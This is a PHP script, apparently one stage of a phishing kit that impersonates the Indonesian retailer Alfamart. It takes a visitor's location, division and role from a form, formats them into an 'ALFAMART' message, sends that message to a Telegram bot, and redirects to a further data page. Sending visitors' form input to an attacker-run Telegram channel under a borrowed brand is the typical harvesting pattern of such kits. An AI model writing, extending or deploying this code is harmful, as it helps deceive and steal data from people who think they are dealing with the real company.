<?php
session_start(); // Mulai session untuk menyimpan data

// Ambil input dari form
$location = isset($_POST['location']) ? $_POST['location'] : null;
$division = isset($_POST['division']) ? $_POST['division'] : null;
$role = isset($_POST['role']) ? $_POST['role'] : null;

// Validasi input
if (empty($location) || empty($division)) {
    echo "Kolom lokasi dan divisi harus diisi.";
    exit();
}

// Simpan data lokasi, divisi, dan role ke dalam session
$_SESSION['location'] = $location;
$_SESSION['division'] = $division;
$_SESSION['role'] = $role;

// Buat pesan yang akan dikirim ke Telegram
$message = "┌─────═━┈┈━═─────┐\n";
$message .= "║\n";
$message .= "╠➥ ALFAMART\n";
$message .= "║\n";
$message .= "╠➥ Divisi: $division\n";
$message .= "║\n";
$message .= "╠➥ Lokasi: $location\n";
$message .= "║\n";

// Periksa apakah role diisi, jika ya, tambahkan ke pesan
if (!empty($role)) {
    $message .= "╠➥ Role: $role\n";
    $message .= "║\n";
} else {
    $message .= "Role: Tidak diisi\n";
}

// Panggil fungsi kirim pesan ke Telegram
require '../telegram.php';
sendMessageToTelegram($message);

// Redirect setelah selesai
header('Location: ../data.html');
exit();
?>
